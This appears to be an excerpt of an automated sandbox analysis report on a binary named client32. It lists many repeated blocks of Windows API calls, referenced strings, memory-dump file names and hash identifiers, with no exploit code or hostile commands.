                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$ErrorExitLastPostProcesswsprintf
                                                                                                                        • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                        • API String ID: 906220102-2830328467
                                                                                                                        • Opcode ID: 6e48cc0f22709dd1f677f00fe8a235e90bb64895bbfe6d3762ec5bb3e875e095
                                                                                                                        • Instruction ID: 526bb494f44a88d6c72e7bb0fbd3121225ec46d2648d8932a1e0f472dc4001e3
                                                                                                                        • Opcode Fuzzy Hash: 6e48cc0f22709dd1f677f00fe8a235e90bb64895bbfe6d3762ec5bb3e875e095
                                                                                                                        • Instruction Fuzzy Hash: F9E086B5A0021DBFD710DE45DC85FD7B3ACEB48764F008429FA1487600DAB0F950C7A0
                                                                                                                        APIs
                                                                                                                        • MapWindowPoints.USER32(00000000,?,?,00000001), ref: 1101D09F
                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                        Strings
                                                                                                                        • m_hWnd, xrefs: 1101D086
                                                                                                                        • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1101D081
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorExitLastMessagePointsProcessWindowwsprintf
                                                                                                                        • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                        • API String ID: 2663631564-2830328467
                                                                                                                        • Opcode ID: fa98f24b7545a8703a321d683b87b1dea4d1bd6490adb13a2f25d9d98fe671f0
                                                                                                                        • Instruction ID: 9c4b2b82cd9adc94e853c670648ed6e4092ddceab183af3ebe85ec827fccdc52
                                                                                                                        • Opcode Fuzzy Hash: fa98f24b7545a8703a321d683b87b1dea4d1bd6490adb13a2f25d9d98fe671f0
                                                                                                                        • Instruction Fuzzy Hash: 8FE0C2B1640319BBD210DA41EC86FE6B39C8B10765F008039F61856580D9B0A98087A1
                                                                                                                        APIs
                                                                                                                        • ShowWindow.USER32(?,?), ref: 1100113B
                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                        Strings
                                                                                                                        • m_hWnd, xrefs: 11001126
                                                                                                                        • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001121
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorExitLastMessageProcessShowWindowwsprintf
                                                                                                                        • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                        • API String ID: 1604732272-2830328467
                                                                                                                        • Opcode ID: b3706d9d212bc44fc63b143c127adaed75df49cf66e2e4508a4744c3dc3a7521
                                                                                                                        • Instruction ID: 23928ab379678a07e0f3a28c7a56dac56e7f9ec3f6936ec539a74ac81f8319a0
                                                                                                                        • Opcode Fuzzy Hash: b3706d9d212bc44fc63b143c127adaed75df49cf66e2e4508a4744c3dc3a7521
                                                                                                                        • Instruction Fuzzy Hash: 4FD02BB5A1032DABC314CA41DC81FD2F3AC9B103A4F004039F62442100D571E540C394
                                                                                                                        APIs
                                                                                                                        • KillTimer.USER32(?,?), ref: 1100102B
                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                        Strings
                                                                                                                        • m_hWnd, xrefs: 11001016
                                                                                                                        • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001011
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorExitKillLastMessageProcessTimerwsprintf
                                                                                                                        • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                        • API String ID: 2229609774-2830328467
                                                                                                                        • Opcode ID: c668625be9c396e8122871d0668cda4b42639a8560f619d3b9b323c4263c3f1c
                                                                                                                        • Instruction ID: ee2bff440c1eeb311b517f53df1393b18d0186c38d15746519086ed5f67e1e1e
                                                                                                                        • Opcode Fuzzy Hash: c668625be9c396e8122871d0668cda4b42639a8560f619d3b9b323c4263c3f1c
                                                                                                                        • Instruction Fuzzy Hash: 50D02BB260032DABC310D641DC80FD2B3DCDB04364F008039FA5442140D670E4808390
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _free
                                                                                                                        • String ID: IsA()$NSMString.cpp
                                                                                                                        • API String ID: 269201875-2362537096
                                                                                                                        • Opcode ID: 49e0b4f523b3a4704b9e28553d5f016e01815797911dbdd6264ee6f7239414b0
                                                                                                                        • Instruction ID: b1e45d112a98bfcec7400ba94fbe768ae9de5fdb54f029e670f3cd2ee855097d
                                                                                                                        • Opcode Fuzzy Hash: 49e0b4f523b3a4704b9e28553d5f016e01815797911dbdd6264ee6f7239414b0
                                                                                                                        • Instruction Fuzzy Hash: 02D0A9BA8882089FCE14AA5C7C41C7E33D88F89218FC40869BD8CA7204E7206C4402EB
                                                                                                                        APIs
                                                                                                                        • FindWindowA.USER32(MSOfficeWClass,00000000), ref: 1110F3EA
                                                                                                                        • SendMessageA.USER32(00000000,00000414,00000000,00000000), ref: 1110F400
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FindMessageSendWindow
                                                                                                                        • String ID: MSOfficeWClass
                                                                                                                        • API String ID: 1741975844-970895155
                                                                                                                        • Opcode ID: ea34c11dfc70926f791b8ca9d524af463d7492e780264d0d8388732ba29401cd
                                                                                                                        • Instruction ID: 17eb5a188d88a84c71184668e46e9585b6c12665a03152ba016c754b78296158
                                                                                                                        • Opcode Fuzzy Hash: ea34c11dfc70926f791b8ca9d524af463d7492e780264d0d8388732ba29401cd
                                                                                                                        • Instruction Fuzzy Hash: 2BD0127035035977E6001AA2DD4EF99BB5CDB44B55F118024F706AA0C1DBB0B440876A
                                                                                                                        APIs
                                                                                                                        • SetEvent.KERNEL32(00000000), ref: 685ADAE4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Event
                                                                                                                        • String ID: Refcount.cpp$this->hReadyEvent
                                                                                                                        • API String ID: 4201588131-2118820724
                                                                                                                        • Opcode ID: e53f6f3fee6932fe1fa197ab8c4102f02c68ca67131d2c4e3762bfcbae0d5d3d
                                                                                                                        • Instruction ID: 407b9da54c555abc21c2349756d59ab428aa75f4e56efd4e4391899fb9ba5e2d
                                                                                                                        • Opcode Fuzzy Hash: e53f6f3fee6932fe1fa197ab8c4102f02c68ca67131d2c4e3762bfcbae0d5d3d
                                                                                                                        • Instruction Fuzzy Hash: 62D01331544211FFC6105658A845BDD32A45B45355F415575F90551144D660684947D8
                                                                                                                        APIs
                                                                                                                        • GetMenu.USER32(00000000), ref: 1101D064
                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                        Strings
                                                                                                                        • m_hWnd, xrefs: 1101D053
                                                                                                                        • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1101D04E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorExitLastMenuMessageProcesswsprintf
                                                                                                                        • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                        • API String ID: 1590435379-2830328467
                                                                                                                        • Opcode ID: c7b93495bf7068046200dc23c21ea9923ab35a6c9bf7b9f7b571f0dbc23fbce4
                                                                                                                        • Instruction ID: a479ae3ba71ad1bbfd929d5f192baf473b643c420dccf9ee561c4944f6f7f77e
                                                                                                                        • Opcode Fuzzy Hash: c7b93495bf7068046200dc23c21ea9923ab35a6c9bf7b9f7b571f0dbc23fbce4
                                                                                                                        • Instruction Fuzzy Hash: 51D022B5E0023AABC320E611ECC8FC6B2A85B00318F044468F12062000E678E480C380
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: MenuProp
                                                                                                                        • String ID: OldMenu
                                                                                                                        • API String ID: 601939786-3235417843
                                                                                                                        • Opcode ID: bcb887040fc688b3d48361d640a276ef1f898a207ca6826fe873eb45f49f39ab
                                                                                                                        • Instruction ID: 521654fc19124d4f771c6bc11addf53dd8358c346f2b3ea316e48a946e839c39
                                                                                                                        • Opcode Fuzzy Hash: bcb887040fc688b3d48361d640a276ef1f898a207ca6826fe873eb45f49f39ab
                                                                                                                        • Instruction Fuzzy Hash: 96C0123260653D7782421A959D85ACEF76CAD162653008062FA10A2100F724551187EA